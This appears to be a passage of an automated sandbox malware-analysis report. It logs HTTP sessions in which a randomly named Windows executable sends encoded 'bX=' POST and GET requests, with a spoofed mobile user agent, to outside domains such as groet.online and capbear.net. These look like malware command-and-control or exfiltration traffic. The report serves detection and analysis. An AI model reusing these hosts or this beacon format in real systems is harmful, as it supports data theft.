Q0S/DLH9ctVV9i/C/2bm2UYuxBLsaDlliB00FbBHXqSKM8l2VSv2BMXE+aWHEvYEr8HUg9X8yu4igR/wDlApPIffiUVrUaf6AeEuZiaIhyMhrRgVoFvBF08+h14ku3urJbSpNhPzVCOs0Snki [TRUNCATED]
                              Sep 16, 2024 09:32:26.424429893 CEST384INHTTP/1.1 301 Moved Permanently
                              Server: nginx/1.14.2
                              Date: Mon, 16 Sep 2024 07:32:26 GMT
                              Content-Type: text/html
                              Content-Length: 185
                              Connection: close
                              Location: https://www.capbear.net/ijno/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.554911104.207.148.13780728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:28.371253967 CEST461OUTGET /ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dy+WEToB6xBGpoD2p7QTvgcO3M3YppYLGUXZXpGn5emzv8m+RO5fgId9MtFylBATvIp79Sr7dA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.capbear.net
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:32:28.946494102 CEST531INHTTP/1.1 301 Moved Permanently
                              Server: nginx/1.14.2
                              Date: Mon, 16 Sep 2024 07:32:28 GMT
                              Content-Type: text/html
                              Content-Length: 185
                              Connection: close
                              Location: https://www.capbear.net/ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dy+WEToB6xBGpoD2p7QTvgcO3M3YppYLGUXZXpGn5emzv8m+RO5fgId9MtFylBATvIp79Sr7dA==&RFRd_=tFLD
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.554912185.104.29.1280728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:34.045397043 CEST724OUTPOST /kdsf/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.groet.online
                              Origin: http://www.groet.online
                              Referer: http://www.groet.online/kdsf/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 72 70 6e 37 55 4f 58 4b 49 4e 42 5a 55 43 43 52 64 37 63 78 51 62 63 2b 6b 59 62 52 4f 7a 70 55 79 6e 47 2f 30 31 78 63 4e 39 6c 79 6d 79 4e 31 6e 50 77 7a 6b 2f 4e 35 47 39 70 4d 52 49 2f 39 49 45 51 71 46 41 32 46 4e 77 4c 72 57 30 32 34 58 4c 7a 73 50 4c 31 44 77 55 67 46 77 76 42 48 74 32 76 4b 73 71 55 54 43 2b 78 7a 70 46 63 6b 49 5a 6e 57 4d 44 5a 79 71 62 57 4c 2b 39 39 6e 52 55 42 2b 55 62 67 64 5a 58 59 75 78 32 45 54 54 45 62 4f 65 39 75 64 64 30 38 54 4c 73 66 56 4f 69 78 79 45 6e 48 79 66 52 52 50 6a 56 37 4f 6e 47 48 73 75 61 30 34 41 32 64 54 5a 51 77 77 4a 36 64 33 75 4f 77 3d
                              Data Ascii: bX=rpn7UOXKINBZUCCRd7cxQbc+kYbROzpUynG/01xcN9lymyN1nPwzk/N5G9pMRI/9IEQqFA2FNwLrW024XLzsPL1DwUgFwvBHt2vKsqUTC+xzpFckIZnWMDZyqbWL+99nRUB+UbgdZXYux2ETTEbOe9udd08TLsfVOixyEnHyfRRPjV7OnGHsua04A2dTZQwwJ6d3uOw=
                              Sep 16, 2024 09:32:35.473238945 CEST1236INHTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:34 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              access-control-allow-origin: http://www.groet.online
                              access-control-allow-credentials: true
                              access-control-expose-headers: true
                              x-drupal-dynamic-cache: UNCACHEABLE
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-encoding: gzip
                              content-length: 4175
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 [TRUNCATED]
                              Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
                              Sep 16, 2024 09:32:35.473280907 CEST1236INData Raw: 0d d9 76 42 23 25 5c f8 4c 3c 46 a1 1d e8 63 c6 64 aa 1b 54 fc 0c 3f d6 6d f8 a1 ff 62 a7 ff dd d8 bb b8 7f d7 0c fa 93 ef bf bf b4 7b 2e fe e1 78 d2 b4 4f 6f ee 69 e3 78 60 8f df a0 76 8d c1 ff de c4 76 80 3a f5 af 90 33 fd 86 4b 67 c8 e8 ed 60
                              Data Ascii: vB#%\L<FcdT?mb{.xOoix`vv:3Kg`W6t".vh27wyE/>^^oy{{:x3L>7}:3,8u+x?N'0io;w[}yo//QKaJKe
                              Sep 16, 2024 09:32:35.473316908 CEST448INData Raw: 1e bf 16 f0 ba eb 99 98 c7 b7 03 cb 63 b3 30 e1 61 3b b1 83 cb cf 12 32 0c 3c 0d 60 92 cb b9 bc 78 c5 73 39 69 c9 10 7d e4 1b 8b e9 5a 65 1a 86 4c 5e 98 a8 06 9f 12 01 13 7c 89 f0 2c 12 ea 2b 2a 05 8d 70 87 75 fe 14 17 f3 48 68 c4 dd 79 2d bc c6
                              Data Ascii: c0a;2<`xs9i}ZeL^|,+*puHhy-3DJ#{.m )Ar;6I i2;wJiGN`8)K6[h%<7L4w[u(`j\k`(ly6s:06oSGt22iY
                              Sep 16, 2024 09:32:35.473351002 CEST1236INData Raw: 82 39 5a 4e ca 9a 62 2e 15 9d c6 e8 6c 49 1c ca da 58 fc ea e1 db 93 cf b9 af 15 f9 cf 65 7b cc f2 a1 c9 98 9d 28 17 b0 07 1c df 3a b7 b5 95 e8 cb 91 01 61 01 1d b9 f8 f7 1c fe 97 13 fb 2e a2 39 12 08 17 dd 80 82 8d 68 c2 c1 79 66 36 3e 9b c0 1a
                              Data Ascii: 9ZNb.lIXe{(:a.9hyf6>_n^J;z;9LlKk[CCm3uE(rn5J>7G7r9eBX)GSS~z8mDV(VXoeWir"SYM>"M8,S^YHM)u%
                              Sep 16, 2024 09:32:35.473387957 CEST680INData Raw: b7 5f ae 4f 96 cf 77 46 a5 95 12 a7 7c 24 bb 52 ff fe 82 6e 1f eb eb d3 52 82 97 5c 3b 31 6f 58 b8 cd e6 24 44 8f d9 2e e2 d3 11 2b 5d 49 25 8f cd 2a c2 b6 1e 5e 44 32 a0 17 4d ad b2 ce ac 46 3c 46 01 03 94 c1 67 ee 75 64 6e 69 63 5d 51 cf 6a c4
                              Data Ascii: _OwF|$RnR\;1oX$D.+]I%*^D2MF<Fgudnic]QjmQT}@V,C&,b|]KUmA+Pt<3\+4gk#3bd\MnhBGI|L5LHt jJ>=PovEG
                              Sep 16, 2024 09:32:35.473486900 CEST1236INHTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:34 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              access-control-allow-origin: http://www.groet.online
                              access-control-allow-credentials: true
                              access-control-expose-headers: true
                              x-drupal-dynamic-cache: UNCACHEABLE
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-encoding: gzip
                              content-length: 4175
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 [TRUNCATED]
                              Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.554913185.104.29.1280728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:36.598674059 CEST744OUTPOST /kdsf/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.groet.online
                              Origin: http://www.groet.online
                              Referer: http://www.groet.online/kdsf/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 72 70 6e 37 55 4f 58 4b 49 4e 42 5a 56 69 53 52 66 5a 30 78 58 37 63 78 71 34 62 52 63 7a 70 51 79 6e 43 2f 30 77 51 58 4e 76 52 79 6d 58 78 31 67 2b 77 7a 6c 2f 4e 35 4f 64 70 4a 50 34 2f 32 49 45 63 55 46 45 32 46 4e 77 66 72 57 78 4b 34 57 36 7a 6a 4f 62 31 42 32 55 67 44 2f 50 42 48 74 32 76 4b 73 71 41 31 43 2b 4a 7a 71 30 73 6b 4a 39 54 58 54 7a 5a 78 70 62 57 4c 36 39 39 6a 52 55 42 49 55 61 38 33 5a 56 51 75 78 7a 67 54 55 51 76 4e 4c 74 76 57 5a 30 39 39 50 70 75 68 4b 51 35 39 4a 78 61 4c 4b 6e 56 78 72 44 57 6b 39 6b 50 45 39 36 59 41 51 6c 56 6b 49 67 52 5a 54 5a 4e 48 77 5a 6e 65 74 47 51 71 54 39 57 4e 78 45 76 49 2f 4e 62 6b 6b 31 36 6c
                              Data Ascii: bX=rpn7UOXKINBZViSRfZ0xX7cxq4bRczpQynC/0wQXNvRymXx1g+wzl/N5OdpJP4/2IEcUFE2FNwfrWxK4W6zjOb1B2UgD/PBHt2vKsqA1C+Jzq0skJ9TXTzZxpbWL699jRUBIUa83ZVQuxzgTUQvNLtvWZ099PpuhKQ59JxaLKnVxrDWk9kPE96YAQlVkIgRZTZNHwZnetGQqT9WNxEvI/Nbkk16l
                              Sep 16, 2024 09:32:37.444453001 CEST1236INHTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:37 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              access-control-allow-origin: http://www.groet.online
                              access-control-allow-credentials: true
                              access-control-expose-headers: true
                              x-drupal-dynamic-cache: UNCACHEABLE
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-encoding: gzip
                              content-length: 4175
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 [TRUNCATED]
                              Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
                              Sep 16, 2024 09:32:37.444474936 CEST1236INData Raw: 0d d9 76 42 23 25 5c f8 4c 3c 46 a1 1d e8 63 c6 64 aa 1b 54 fc 0c 3f d6 6d f8 a1 ff 62 a7 ff dd d8 bb b8 7f d7 0c fa 93 ef bf bf b4 7b 2e fe e1 78 d2 b4 4f 6f ee 69 e3 78 60 8f df a0 76 8d c1 ff de c4 76 80 3a f5 af 90 33 fd 86 4b 67 c8 e8 ed 60
                              Data Ascii: vB#%\L<FcdT?mb{.xOoix`vv:3Kg`W6t".vh27wyE/>^^oy{{:x3L>7}:3,8u+x?N'0io;w[}yo//QKaJKe
                              Sep 16, 2024 09:32:37.444488049 CEST1236INData Raw: 1e bf 16 f0 ba eb 99 98 c7 b7 03 cb 63 b3 30 e1 61 3b b1 83 cb cf 12 32 0c 3c 0d 60 92 cb b9 bc 78 c5 73 39 69 c9 10 7d e4 1b 8b e9 5a 65 1a 86 4c 5e 98 a8 06 9f 12 01 13 7c 89 f0 2c 12 ea 2b 2a 05 8d 70 87 75 fe 14 17 f3 48 68 c4 dd 79 2d bc c6
                              Data Ascii: c0a;2<`xs9i}ZeL^|,+*puHhy-3DJ#{.m )Ar;6I i2;wJiGN`8)K6[h%<7L4w[u(`j\k`(ly6s:06oSGt22iY
                              Sep 16, 2024 09:32:37.444499969 CEST1128INData Raw: 8b 82 3b cc 7d f6 42 66 c7 96 26 db 16 8c 30 97 0e 8c 90 56 0c 14 55 09 f0 54 26 33 9f 13 2c 26 66 71 ab 5f 42 66 70 61 90 b1 2c 2d a8 f2 51 4b 6d 58 17 66 03 a3 66 60 de e9 fc 9c 7f 79 7a 50 ed ac 7a 86 70 91 1e 5d 32 a2 28 64 7a 49 99 1f 10 93
                              Data Ascii: ;}Bf&0VUT&3,&fq_Bfpa,-QKmXff`yzPzp]2(dzIxhv0zt)+jf%StD{(y/drgP[P]'Z9}dYl7?V!Y75x/Er#@R%q"u *<SPFSW


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.554914185.104.29.1280728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:39.143508911 CEST1761OUTPOST /kdsf/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.groet.online
                              Origin: http://www.groet.online
                              Referer: http://www.groet.online/kdsf/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 72 70 6e 37 55 4f 58 4b 49 4e 42 5a 56 69 53 52 66 5a 30 78 58 37 63 78 71 34 62 52 63 7a 70 51 79 6e 43 2f 30 77 51 58 4e 76 70 79 6d 68 46 31 6e 74 49 7a 69 2f 4e 35 53 4e 70 79 50 34 2f 6e 49 41 34 59 46 46 4b 56 4e 7a 6e 72 58 54 79 34 65 75 76 6a 48 62 31 42 36 30 67 43 77 76 42 53 74 32 2f 57 73 71 51 31 43 2b 4a 7a 71 33 6b 6b 4f 70 6e 58 56 7a 5a 79 71 62 58 4b 2b 39 39 4c 52 55 49 39 55 61 49 4e 5a 45 77 75 2f 7a 51 54 57 6c 62 4e 4b 4e 76 55 65 30 39 54 50 70 71 2b 4b 55 68 48 4a 78 47 74 4b 67 68 78 34 6e 76 69 6d 47 4c 76 2b 72 46 34 58 6e 64 70 65 6b 6b 35 62 35 46 69 39 4a 37 7a 75 57 63 6b 46 35 61 57 37 57 6a 46 68 61 65 7a 6b 77 7a 46 31 6b 4f 33 55 45 51 48 7a 4a 70 4a 4b 5a 63 51 5a 57 76 67 59 48 55 2b 52 50 4a 5a 4a 4a 74 53 4d 61 78 76 56 57 54 32 45 4f 36 4f 32 35 4b 6f 62 36 32 34 43 73 38 77 32 4e 77 67 65 34 47 41 65 62 5a 30 68 32 68 2b 31 69 79 64 77 79 6f 61 6a 65 53 36 74 68 6a 4c 50 4b 66 53 76 5a 51 49 4b 57 59 72 66 6f 53 58 5a 6e 78 43 73 75 37 54 35 34 34 [TRUNCATED]
                              Data Ascii: bX=rpn7UOXKINBZViSRfZ0xX7cxq4bRczpQynC/0wQXNvpymhF1ntIzi/N5SNpyP4/nIA4YFFKVNznrXTy4euvjHb1B60gCwvBSt2/WsqQ1C+Jzq3kkOpnXVzZyqbXK+99LRUI9UaINZEwu/zQTWlbNKNvUe09TPpq+KUhHJxGtKghx4nvimGLv+rF4Xndpekk5b5Fi9J7zuWckF5aW7WjFhaezkwzF1kO3UEQHzJpJKZcQZWvgYHU+RPJZJJtSMaxvVWT2EO6O25Kob624Cs8w2Nwge4GAebZ0h2h+1iydwyoajeS6thjLPKfSvZQIKWYrfoSXZnxCsu7T544BX3RpsxLq/jgxSZ8LcAQSHnrNahdIiZNBbGJovSjuPgE7sCbPe/XPN0sJla+TdfQ5moWD6ddrgWMu97J6kgCPZF6UFlNzjSpUqPuygwlsYGSWchYsXNHPPufcSOkIeXya/T/eM5N//baT8QseG1RBBfWwJd0mEZdIA8XLO6/2TpmJ2V7y5A3f3YTJnK48vT3ievxJu5DBpq3vkZdgLqBgfbnSuzZV9xhm8ULq+N8VObooXkGnY8VNz/Xw80/4N9X0E4KYPXYQNPfLwW0rlMkuMXIRj0GyXHoe3CeE4vN3jHq4FpWfqhDvm1kBmLPK1jpJWPUMFfvuIq+D/IznfRCR4u+u5MPpc1GuLNQotBCg07qIoSHovlwjqoHTZmZGdiUhDtZ/PHvDBa9LDRzcltfz3qzCq58+hlYK3vI9jW09DV/NF5UTOGX3LjIT7uUd93AOtDF0rT+4oSRsWztIeSt9FK4YfST65K2wRBilU+SNXg69+/f2WGlRYczXfdJQ8yzEj/2Ft8jILEiAkA/Oqj1S5fAhek33nXNagnh2XSR1vk0iGVumEEnbbsFIYIjzqZhwwWqZOCFBMM/DcKzok6zzt7s8WUHOs4ehQzgT74JoNQNuvkOQUNAnoREOIONEue0pDVS2GTm5twQ3AMf0Gqpt1eV1OeSD5Z+2q [TRUNCATED]
                              Sep 16, 2024 09:32:40.085836887 CEST1236INHTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:39 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              access-control-allow-origin: http://www.groet.online
                              access-control-allow-credentials: true
                              access-control-expose-headers: true
                              x-drupal-dynamic-cache: UNCACHEABLE
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-encoding: gzip
                              content-length: 4175
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 [TRUNCATED]
                              Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
